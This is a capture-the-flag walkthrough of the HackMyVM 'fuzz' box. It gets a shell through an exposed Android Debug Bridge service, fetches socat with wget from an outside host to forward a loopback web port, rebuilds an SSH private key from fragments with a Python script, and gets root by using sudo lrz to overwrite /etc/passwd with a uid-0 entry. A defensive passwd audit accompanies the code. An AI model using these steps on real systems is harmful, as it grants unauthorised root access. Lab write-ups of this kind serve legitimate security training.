HackMyVM machine: fuzz (easy)
I. Information gathering
1. Getting target information
❯ rustscan -a 192.168.67.4
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
I don't always scan ports, but when I do, I prefer RustScan.
[~] The config file is expected to be at "/Users/xzr1973/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.67.4:22
Open 192.168.67.4:5555
...
...
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
5555/tcp open freeciv syn-ack
Two open ports: 22 and 5555.
Use nmap with service detection to find out what is actually on 5555:
❯ nmap -sT -sV -Pn -v 192.168.67.4
Starting Nmap 7.97 ( https://nmap.org ) at 2025-08-19 16:09 +0800
...
...
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.9 (protocol 2.0)
5555/tcp open adb Android Debug Bridge (token auth required)
Service Info: OS: Android; CPE: cpe:/o:linux:linux_kernel
(Which shows that nmap alone would have done the job from the start, QAQ.) Port 5555 is adb, the Android Debug Bridge. nmap reports "token auth required", but the connection below is accepted straight away.
2. Connecting with adb
# connect to the adb service
┌──(root㉿kali)-[~]
└─# adb connect 192.168.67.4
connected to 192.168.67.4:5555
# list the attached devices
┌──(root㉿kali)-[~]
└─# adb devices
List of devices attached
192.168.67.4:5555 device
# the filesystem root is owned by primary:root and is not writable by our unprivileged ($-prompt) shell user
┌──(root㉿kali)-[~]
└─# adb shell
/ $ ls -al
total 73
drwxr-xr-x 21 primary root 4096 May 19 08:45 .
drwxr-xr-x 21 primary root 4096 May 19 08:45 ..
...
drwxrwxrwt 4 primary root 80 Aug 19 15:47 tmp
drwxr-xr-x 9 primary root 4096 May 19 09:45 usr
drwxr-xr-x 12 primary root 4096 May 19 10:53 var
# go to our own home directory
┌──(root㉿kali)-[~]
└─# adb shell
/ $ cd
~ $ ls -al
total 8
drwx------ 2 runner runner 4096 May 19 09:08 .
drwxr-xr-x 4 primary root 4096 May 19 10:02 ..
lrwxrwxrwx 1 primary runner 9 May 19 09:08 .ash_history -> /dev/null
# our home directory belongs to us (runner, mode 700), and .ash_history is a symlink to /dev/null, so nothing typed here is recorded
II. Getting a user
1. Checking network listeners
┌──(root㉿kali)-[~]
└─# adb shell
/ $ cd
~ $ netstat -anp
netstat: showing only processes with your user ID
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:5555 0.0.0.0:* LISTEN 2388/python3
tcp 0 0 127.0.0.1:80 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 24 0 192.168.67.4:5555 192.168.67.1:52472 ESTABLISHED 2388/python3
tcp 0 0 192.168.67.4:5555 192.168.67.1:52431 TIME_WAIT -
tcp 0 0 192.168.67.4:5555 192.168.67.1:52457 TIME_WAIT -
tcp 0 0 :::22 :::* LISTEN -
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags Type State I-Node PID/Program name Path
unix 2 [ ] DGRAM CONNECTED 15706 -
unix 3 [ ] DGRAM CONNECTED 15654 - /dev/log
There is a web service on port 80 bound to 127.0.0.1 only, so it is not reachable from outside. Note also that the adb listener on 5555 is a python3 process rather than a real adbd, so adb's own port forwarding (adb forward) may not be implemented; a port forwarder run on the box works regardless.
Upload a socat executable (a static build for the device's architecture is the safe choice) and use it to expose the loopback-only port:
┌──(root㉿kali)-[~]
└─# adb shell
/ $ cd
~ $ wget xxx.xxx.xxx.xxx/socat
saving to 'socat'
socat 100% |********************************| 347k 0:00:00 ETA
'socat' saved
~ $
┌──(root㉿kali)-[~]
└─# adb shell
/ $ cd
~ $ chmod +x socat
~ $ ./socat TCP-LISTEN:8000,fork TCP4:127.0.0.1:80 &
The listener is bound to 127.0.0.1, so the forward target must be the loopback address, not the box's LAN IP. Once the forwarder is up, confirm from the attacking machine with nmap:
❯ nmap -p 8000 192.168.67.4
Starting Nmap 7.97 ( https://nmap.org ) at 2025-08-19 16:36 +0800
Nmap scan report for 192.168.67.4
Host is up (0.068s latency).
PORT STATE SERVICE
8000/tcp open http-alt
Nmap done: 1 IP address (1 host up) scanned in 0.65 seconds
Port 8000 shows open, so the forward is working.
Directory fuzzing against the forwarded port (8000 here, with ip set to the target address) turns up /line, and the names follow a pattern.
Enumerating /line2, /line3, ... shows the series ends at /line5; /line6 returns a 404:
❯ curl $ip:8000/line
❯ curl $ip:8000/line2
❯ curl $ip:8000/line3
❯ curl $ip:8000/line4
❯ curl $ip:8000/line5
❯ curl $ip:8000/line6
<!doctype html>
<html lang=en>
<title>404 Not Found</title>
<h1>Not Found</h1>
<p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
2. Getting an SSH session
Recursing further, the fragments turn out to be the base64 lines of an SSH private key. I scripted the enumeration and then restored the format (header, footer and 70-column line breaks):
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACArnEFFrjDI6rYt5GmUDxMvSeX3pcn0GGBfgo1EQtXpgwAAAJDS3+5f0t/u
XwAAAAtzc2gtZWQyNTUxOQAAACArnEFFrjDI6rYt5GmUDxMvSeX3pcn0GGBfgo1EQtXpgw
AAAEBCjeRitoZJIm1c4i0VD2Muw5nqgb7zC13vMaxS/la+vSucQUWuMMjqti3kaZQPEy9J
5felyfQYYF+CjURC1emDAAAACWFzYWhpQHBoaQECAwQ=
-----END OPENSSH PRIVATE KEY-----
Validate the key, connect with it and grab user.flag. ssh-keygen -y prints the public key together with its comment, asahi@phi, which gives the username to log in as:
❯ ssh-keygen -y -f id
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICucQUWuMMjqti3kaZQPEy9J5felyfQYYF+CjURC1emD asahi@phi
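The fetch-and-reassemble step described above, written out as an added example (my code, not the script from the original write-up). It walks /line, /line2, ... until the first 404, re-wraps the base64 at 70 columns, and then parses the openssh-key-v1 structure to check what ssh-keygen -y implicitly confirms: the magic, the two checkints, the trailing padding, and that the ed25519 private half ends with the public key. FAKE_SERVER is a constructed stand-in for the forwarded web service (holding the five lines shown above); http_fetcher is for the live box, and its base URL is an assumption.

```python
"""Fetch the /line, /line2, ... fragments, rebuild the OpenSSH private key and
sanity-check its structure. Runs offline on constructed sample data."""
import base64
import struct
import urllib.error
import urllib.request
from typing import Callable, Dict, List, Optional

# Constructed stand-in for the forwarded web service: the five base64 lines the
# box served, keyed by path. /line6 is absent, which models the 404 seen above.
FAKE_SERVER: Dict[str, str] = {
    "/line":  "b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW",
    "/line2": "QyNTUxOQAAACArnEFFrjDI6rYt5GmUDxMvSeX3pcn0GGBfgo1EQtXpgwAAAJDS3+5f0t/u",
    "/line3": "XwAAAAtzc2gtZWQyNTUxOQAAACArnEFFrjDI6rYt5GmUDxMvSeX3pcn0GGBfgo1EQtXpgw",
    "/line4": "AAAEBCjeRitoZJIm1c4i0VD2Muw5nqgb7zC13vMaxS/la+vSucQUWuMMjqti3kaZQPEy9J",
    "/line5": "5felyfQYYF+CjURC1emDAAAACWFzYWhpQHBoaQECAwQ=",
}


def http_fetcher(base_url: str) -> Callable[[str], Optional[str]]:
    """Fetcher for the live box, e.g. http_fetcher("http://192.168.67.4:8000")
    (assumed URL). Returns the body, or None on 404 so the walk knows where to stop."""
    def fetch(path: str) -> Optional[str]:
        try:
            with urllib.request.urlopen(base_url + path, timeout=5) as resp:
                return resp.read().decode()
        except urllib.error.HTTPError as err:
            if err.code == 404:
                return None
            raise
    return fetch


def fetch_key_lines(fetch: Callable[[str], Optional[str]], base: str = "/line") -> List[str]:
    """Walk /line, /line2, /line3, ... until the first 404 (the pattern seen above)."""
    lines: List[str] = []
    n = 1
    while True:
        body = fetch(base if n == 1 else f"{base}{n}")
        if body is None:
            return lines
        lines.append(body.strip())
        n += 1


def assemble_private_key(lines: List[str]) -> str:
    """Re-wrap the base64 payload at 70 columns (what ssh-keygen writes) and add the armour."""
    payload = "".join(line.strip() for line in lines)
    wrapped = [payload[i:i + 70] for i in range(0, len(payload), 70)]
    return ("-----BEGIN OPENSSH PRIVATE KEY-----\n"
            + "\n".join(wrapped)
            + "\n-----END OPENSSH PRIVATE KEY-----\n")


def _read_string(buf: bytes, off: int):
    """SSH wire 'string': 4-byte big-endian length followed by that many bytes."""
    if off + 4 > len(buf):
        raise ValueError("truncated blob: lines missing at the end")
    (n,) = struct.unpack(">I", buf[off:off + 4])
    if off + 4 + n > len(buf):
        raise ValueError("truncated blob: lines missing at the end")
    return buf[off + 4:off + 4 + n], off + 4 + n


def parse_openssh_private_key(pem: str) -> dict:
    """Decode an unencrypted openssh-key-v1 blob and check the fields a truncated
    or mis-ordered reassembly breaks (magic, checkints, padding)."""
    body = "".join(l for l in pem.splitlines() if not l.startswith("-----"))
    blob = base64.b64decode(body)
    magic = b"openssh-key-v1\x00"
    if not blob.startswith(magic):
        raise ValueError("bad magic: not an OpenSSH private key")
    off = len(magic)
    cipher, off = _read_string(blob, off)
    kdf, off = _read_string(blob, off)
    _kdfopts, off = _read_string(blob, off)
    (nkeys,) = struct.unpack(">I", blob[off:off + 4])
    off += 4
    if nkeys != 1:
        raise ValueError(f"unexpected key count {nkeys}")
    pub_blob, off = _read_string(blob, off)   # string keytype + string pubkey
    priv, off = _read_string(blob, off)       # private section (plaintext here)
    if cipher != b"none" or kdf != b"none":
        raise ValueError("passphrase-protected key; decrypt with ssh-keygen -p first")
    check1, check2 = struct.unpack(">II", priv[:8])
    if check1 != check2:
        raise ValueError("checkint mismatch: lines missing or out of order")
    p = 8
    key_type, p = _read_string(priv, p)
    pub, p = _read_string(priv, p)
    sec, p = _read_string(priv, p)            # ed25519: 32-byte seed + 32-byte public key
    comment, p = _read_string(priv, p)        # user@host the key was generated for
    padding = priv[p:]
    if padding != bytes(range(1, len(padding) + 1)):
        raise ValueError("bad trailing padding: blob is truncated or corrupted")
    return {
        "key_type": key_type.decode(),
        "comment": comment.decode(),
        "public_key": pub,
        "private_key": sec,
        # Same line that `ssh-keygen -y -f id` prints, so the two can be compared.
        "public_key_line": f"{key_type.decode()} {base64.b64encode(pub_blob).decode()} {comment.decode()}",
    }


if __name__ == "__main__":
    lines = fetch_key_lines(lambda path: FAKE_SERVER.get(path))
    pem = assemble_private_key(lines)
    info = parse_openssh_private_key(pem)
    print(pem)
    print(info["public_key_line"])  # the comment gives the username to try over SSH
```

Against the live box, swap the lambda for http_fetcher("http://<ip>:<forwarded port>"); the structural checks matter because a fragment fetched out of order decodes without error but fails the checkint comparison, and a missing trailing fragment fails the length checks.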
❯ ssh -i id asahi@192.168.67.4
fuzzz:~$ cat user.flag
flag{da39a3ee5e6b4b0d3255bfef95601890afd80709}
3. Privilege escalation with sudo
Check what sudo allows:
fuzzz:~$ sudo -l
Matching Defaults entries for asahi on fuzzz:
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
Runas and Command-specific defaults for asahi:
Defaults!/usr/sbin/visudo env_keep+="SUDO_EDITOR EDITOR VISUAL"
User asahi may run the following commands on fuzzz:
(ALL) NOPASSWD: /usr/local/bin/lrz
lrz is the ZMODEM receiver from lrzsz: it takes a file sent through the terminal and writes it into the current directory, here as root. It has to be run from a terminal that speaks ZMODEM (Tabby was used here); otherwise it just hangs waiting for the transfer. So the plan is to send a replacement passwd file that keeps all the existing entries and adds one user with uid 0:
primary:zSZ7Whrr8hgwY:0:0::/root:/bin/sh
Overwriting the system's /etc/passwd with that file (run sudo lrz from /etc and send a file named passwd; lrz's -y flag is what clobbers an existing file if it refuses) is enough to switch to the new user and get root. The second field holds a crypt(3) hash directly instead of x, so su checks the password against /etc/passwd itself and never consults /etc/shadow.
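As an added example (my code, not from the original write-up), both sides of this step in Python: building the replacement passwd file so that the existing entries survive the overwrite, and the audit a defender would run over /etc/passwd to catch exactly this kind of entry. ORIGINAL_PASSWD is constructed sample content, not the box's real file; the hash in NEW_ENTRY is the one used above.

```python
"""Build the replacement /etc/passwd with a uid-0 account, and the audit that
flags such an entry. Runs offline on constructed sample content."""
from typing import List, Tuple

# Constructed sample of the target's /etc/passwd before the overwrite (only the
# entries needed for the demonstration; not copied from the box).
ORIGINAL_PASSWD = """root:x:0:0:root:/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/sbin/nologin
asahi:x:1000:1000:asahi:/home/asahi:/bin/sh
"""

# The entry used above: traditional DES crypt(3) hash in field 2, uid 0, gid 0.
NEW_ENTRY = "primary:zSZ7Whrr8hgwY:0:0::/root:/bin/sh"


def build_passwd(original: str, entry: str) -> str:
    """Return original + entry. The file sent over lrz replaces /etc/passwd wholesale,
    so every existing line must be kept or logins (including your own) break."""
    fields = entry.split(":")
    if len(fields) != 7:
        raise ValueError("passwd entries have exactly 7 colon-separated fields")
    names = {line.split(":")[0] for line in original.splitlines() if line}
    if fields[0] in names:
        raise ValueError(f"user {fields[0]} already exists; pick another name")
    return original.rstrip("\n") + "\n" + entry + "\n"


def looks_like_crypt_hash(field: str) -> bool:
    """'x', '*' and '!' mean 'see shadow' or 'locked'. Anything that parses as a
    crypt(3) hash is checked by su/login directly, bypassing /etc/shadow."""
    if field in ("x", "*", "!", ""):
        return False
    alphabet = set("./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz")
    if len(field) == 13 and set(field) <= alphabet:        # DES: 2-char salt + 11
        return True
    return field.startswith("$") and field.count("$") >= 3  # $1$ / $5$ / $6$ / $y$ forms


def audit_passwd(text: str) -> List[Tuple[str, List[str]]]:
    """Flag entries a defender should look at: extra uid-0 accounts, hashes or
    empty passwords stored in passwd itself, and malformed lines."""
    findings: List[Tuple[str, List[str]]] = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((f"line {lineno}", ["malformed entry"]))
            continue
        name, pw, uid, _gid, _gecos, _home, _shell = fields
        reasons: List[str] = []
        if uid == "0" and name != "root":
            reasons.append("uid 0 under a name other than root")
        if pw == "":
            reasons.append("empty password field (no password required)")
        elif looks_like_crypt_hash(pw):
            reasons.append("password hash stored in /etc/passwd (shadow bypassed)")
        if reasons:
            findings.append((name, reasons))
    return findings


if __name__ == "__main__":
    new_passwd = build_passwd(ORIGINAL_PASSWD, NEW_ENTRY)
    for name, reasons in audit_passwd(new_passwd):
        print(name, "->", "; ".join(reasons))
```

On the offensive side, write the result of build_passwd to a local file named passwd and send that over ZMODEM; on the defensive side, audit_passwd run against the real /etc/passwd (or a diff against a known-good copy) catches the uid-0 account and the inline hash in one pass.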
fuzzz:~$ su primary
Password:
/home/asahi # cd
~ # ls
root.flag
~ # cat root.flag
flag{46a0e055d5db8d82eee6e7eb3ee3ccf64be3fca2}
III. Collecting the flags
~ # cat root.flag /home/asahi/user.flag
flag{46a0e055d5db8d82eee6e7eb3ee3ccf64be3fca2}
flag{da39a3ee5e6b4b0d3255bfef95601890afd80709}
License:
CC BY 4.0